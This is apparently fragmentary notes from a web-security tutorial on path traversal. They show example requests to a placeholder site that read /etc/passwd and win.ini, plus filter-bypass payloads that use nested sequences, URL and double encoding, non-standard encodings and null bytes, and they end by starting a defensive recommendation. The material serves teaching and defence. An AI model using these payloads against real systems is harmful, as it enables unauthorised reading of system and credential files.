<img src="/loadImage?filename=218.png">
/var/www/images/218.png
https://insecure-website.com/loadImage?filename=../../../etc/passwd
/var/www/images/../../../etc/passwd
https://insecure-website.com/loadImage?filename=..\\..\\..\\windows\\win.ini
You might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.
You might be able to use nested traversal sequences, such as ....// or ....\\/. These revert to simple traversal sequences when the inner sequence is stripped.
web servers may strip any directory traversal sequences before passing your input to the application.
You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters. This results in %2e%2e%2f and %252e%252e%252f respectively. Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also work.
filename=../../../etc/passwd%00.png it might be possible to use a null byte to effectively terminate the file path before the required extension
If you can't avoid passing user-supplied input to filesystem APIs, we recommend using two layers of defense to prevent attacks: